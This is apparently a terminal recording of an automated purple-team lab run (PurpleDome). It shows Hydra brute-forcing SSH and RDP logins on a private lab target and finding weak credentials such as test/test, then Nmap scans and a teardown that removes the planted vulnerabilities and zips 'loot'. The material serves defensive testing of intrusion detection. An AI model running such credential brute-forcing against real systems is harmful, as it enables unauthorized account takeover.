[1143.58797, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\n"]
|
||||
[1143.588112, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:56:07\r\n[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.\r\n"]
|
||||
[1143.588226, "o", "[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n"]
|
||||
[1143.588418, "o", "[DATA] max 4 tasks per 1 server, overall 4 tasks, 40 login tries (l:5/p:8), ~10 tries per task\r\n[DATA] attacking rdp://192.168.178.145:3389/\r\n"]
|
||||
[1144.144217, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n"]
|
||||
[1144.148391, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n"]
|
||||
[1144.148795, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n"]
|
||||
[1144.149246, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n"]
|
||||
[1144.157408, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n"]
|
||||
[1144.159518, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n"]
|
||||
[1144.160769, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n"]
|
||||
[1144.161189, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n"]
|
||||
[1144.169608, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: 12345, continuing attacking the account.\r\n"]
|
||||
[1144.169715, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n"]
|
||||
[1144.170303, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty, continuing attacking the account.\r\n"]
|
||||
[1144.170512, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n"]
|
||||
[1144.178448, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n"]
|
||||
[1144.179424, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n"]
|
||||
[1144.179691, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n"]
|
||||
[1144.18033, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: passw0rd, continuing attacking the account.\r\n"]
|
||||
[1144.188691, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n"]
|
||||
[1144.189722, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n"]
|
||||
[1144.191904, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n"]
|
||||
[1144.193944, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n"]
|
||||
[1144.199675, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attacking the account.\r\n"]
|
||||
[1144.200299, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n"]
|
||||
[1144.200436, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n"]
|
||||
[1144.209136, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n"]
|
||||
[1144.20928, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n"]
|
||||
[1144.209856, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n"]
|
||||
[1144.210193, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, continuing attacking the account.\r\n"]
|
||||
[1144.219171, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n"]
|
||||
[1144.219851, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n"]
|
||||
[1144.220367, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n"]
|
||||
[1144.220713, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n"]
|
||||
[1144.229099, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n"]
|
||||
[1144.229789, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwertz, continuing attacking the account.\r\n"]
|
||||
[1144.23002, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing attacking the account.\r\n"]
|
||||
[1144.230646, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n"]
|
||||
[1144.239324, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n"]
|
||||
[1144.239896, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n"]
|
||||
[1144.24068, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n"]
|
||||
[1144.241006, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n"]
|
||||
[1144.247662, "o", "1 of 1 target completed, 0 valid password found\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:08\r\n"]
|
||||
[1144.255595, "o", "Command exited with status 0.\r\n=== stdout ===\r\nReading package lists...\r\nBuilding dependency tree...\r\nReading state information...\r\nhydra is already the newest version (9.1-1).\r\n0 upgraded, 0 newly installed, 0 to remove and 1389 not upgraded.\r\nHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:55:59\r\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 40 login tries (l:5/p:8), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.145:22/\r\n[22][ssh] host: 192.168.178.145 login: test password: test\r\n[22][ssh] host: 192.168.178.145 login: password password: passw0rd\r\n1 of 1 target successfully completed, 2 valid passwords found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) fi"]
|
||||
[1144.255716, "o", "nished at 2021-06-09 02:56:07\r\nHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:56:07\r\n[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.\r\n[DATA] max 4 tasks per 1 server, overall 4 tasks, 40 login tries (l:5/p:8), ~10 tries per task\r\n[DATA] attacking rdp://192.168.178.145:3389/\r\n1 of 1 target completed, 0 valid password found\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:08\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\nWARNING: apt does not have a stable CLI interface. Use with caution in scripts.\r\n\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 t"]
|
||||
[1144.255769, "o", "arget did not complete\r\n[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not acti"]
|
||||
[1144.255809, "o", "ve for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty"]
|
||||
[1144.255849, "o", ", continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n[3389]"]
|
||||
[1144.25588, "o", "[rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.17"]
|
||||
[1144.255921, "o", "8.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n[3389][r"]
|
||||
[1144.255953, "o", "dp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing"]
|
||||
[1144.255987, "o", " attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\n\r\nWARNING: apt does not have a stable CLI interface. Us"]
|
||||
[1144.256016, "o", "e with caution in scripts.\r\n\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n[3389][rdp] acc"]
|
||||
[1144.256047, "o", "ount on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account "]
|
||||
[1144.256075, "o", "not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root passwor"]
|
||||
[1144.256105, "o", "d: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attac"]
|
||||
[1144.256136, "o", "king the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, co"]
|
||||
[1144.256166, "o", "ntinuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: non"]
|
||||
[1144.256191, "o", "existend_user_2 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not"]
|
||||
[1144.256222, "o", " active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n"]
|
||||
[1149.257446, "o", "Attacking machine with PAW: target3 with attack: nmap\r\n"]
|
||||
[1149.263047, "o", "zsh:cd:1: no such file or directory: None\r\n"]
|
||||
[1149.290654, "o", "Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\n"]
|
||||
[1149.386065, "o", "Nmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\n"]
|
||||
[1149.38617, "o", "Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds\r\n"]
|
||||
[1149.392608, "o", "Command exited with status 0.\r\n=== stdout ===\r\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\nNmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 0.12 seconds\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\n"]
|
||||
[1154.397646, "o", "Attacking machine with PAW: target3 with attack: nmap_stresstest\r\n"]
|
||||
[1154.404994, "o", "zsh:cd:1: no such file or directory: None\r\n"]
|
||||
[1154.430451, "o", "Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\n"]
|
||||
[1154.466996, "o", "Nmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\n"]
|
||||
[1154.467118, "o", "Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds\r\n"]
|
||||
[1154.474324, "o", "Command exited with status 0.\r\n=== stdout ===\r\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\nNmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 0.06 seconds\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\n"]
|
||||
[1154.474419, "o", "Debug: Stderr: zsh:cd:1: no such file or directory: None\r\n"]
|
||||
[1159.477456, "o", "\u001b[92mFinished Kali attacks\u001b[0m\r\n"]
|
||||
[1159.69311, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[1169.750938, "o", "Could Not Find C:\\capture\\winidp_data.zip\r\r\n"]
|
||||
[1169.765534, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nCould Not Find C:\\capture\\winidp_data.zip\r\n\r\nDebug: Stderr: Could Not Find C:\\capture\\winidp_data.zip\r\n"]
|
||||
[1169.86244, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[1170.144087, "o", " 1 file(s) copied.\r\r\n"]
|
||||
[1170.158542, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"]
|
||||
[1170.216215, "o", "sudo kill -SIGHUP $(pidof -s idpx); while [ ! -f /tmp/idpx.proto ]; do sleep 1; done ; rm ~/idpx\r\n"]
|
||||
[1171.267669, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[1171.275309, "o", "\u001b[94m Uninstalling vulnerabilities on target2w \u001b[0m\r\n"]
|
||||
[1171.339028, "o", "The command completed successfully.\r\r\n\r\r\n"]
|
||||
[1171.356677, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe command completed successfully.\r\n\r\n(no stderr)\r\n"]
|
||||
[1171.45084, "o", "The command completed successfully.\r\r\n\r\r\n"]
|
||||
[1171.473186, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe command completed successfully.\r\n\r\n(no stderr)\r\n"]
|
||||
[1171.543427, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"]
|
||||
[1171.803471, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"]
|
||||
[1172.047409, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"]
|
||||
[1172.31145, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"]
|
||||
[1172.570747, "o", "The operation completed successfully.\r\r\r\n"]
|
||||
[1172.583944, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"]
|
||||
[1172.807534, "o", "\r\r\nUpdated 3 rule(s).\r\r\n"]
|
||||
[1172.807667, "o", "Ok.\r\r\n"]
|
||||
[1172.807739, "o", "\r\r\n"]
|
||||
[1172.844854, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\n\r\n(no stderr)\r\n\u001b[92m Done uninstalling vulnerabilities on target2w \u001b[0m\r\n\u001b[94m Uninstalling vulnerabilities on target3 \u001b[0m\r\n"]
|
||||
[1172.862366, "o", "userdel: test mail spool (/var/mail/test) not found\r\n"]
|
||||
[1172.877426, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nuserdel: test mail spool (/var/mail/test) not found\r\n\r\nDebug: Stderr: userdel: test mail spool (/var/mail/test) not found\r\n"]
|
||||
[1172.925985, "o", "userdel: password mail spool (/var/mail/password) not found\r\n"]
|
||||
[1172.945432, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nuserdel: password mail spool (/var/mail/password) not found\r\n\r\nDebug: Stderr: userdel: password mail spool (/var/mail/password) not found\r\n"]
|
||||
[1172.957449, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[1173.009901, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
|
||||
[1173.010037, "o", "\u001b[92m Done uninstalling vulnerabilities on target3 \u001b[0m\r\n\u001b[94mStopping machine: target2 \u001b[0m\r\n"]
|
||||
[1176.20632, "o", "\u001b[92mMachine stopped: target2\u001b[0m\r\n\u001b[94mStopping machine: target3 \u001b[0m\r\n"]
|
||||
[1181.648082, "o", "\u001b[92mMachine stopped: target3\u001b[0m\r\n\u001b[94mStopping machine: attacker \u001b[0m\r\n"]
|
||||
[1186.901824, "o", "\u001b[92mMachine stopped: attacker\u001b[0m\r\n"]
|
||||
[1186.90263, "o", "Creating zip file loot/2021_06_09___08_38_02/2021_06_09___08_38_02.zip\r\n"]
|
||||
[1186.931928, "o", "\u001b]0;thorsten@avast: /home/PurpleDome\u0007\u001b[01;32mthorsten@avast\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "]
|
||||
[1233.852884, "o", "e"]
|
||||
[1234.124846, "o", "x"]
|
||||
[1234.380891, "o", "i"]
|
||||
[1234.556928, "o", "t"]
|
||||
[1235.261009, "o", "\r\n"]
|
||||
[1235.261116, "o", "exit\r\n"]
|
||||
|
Loading…
Reference in New Issue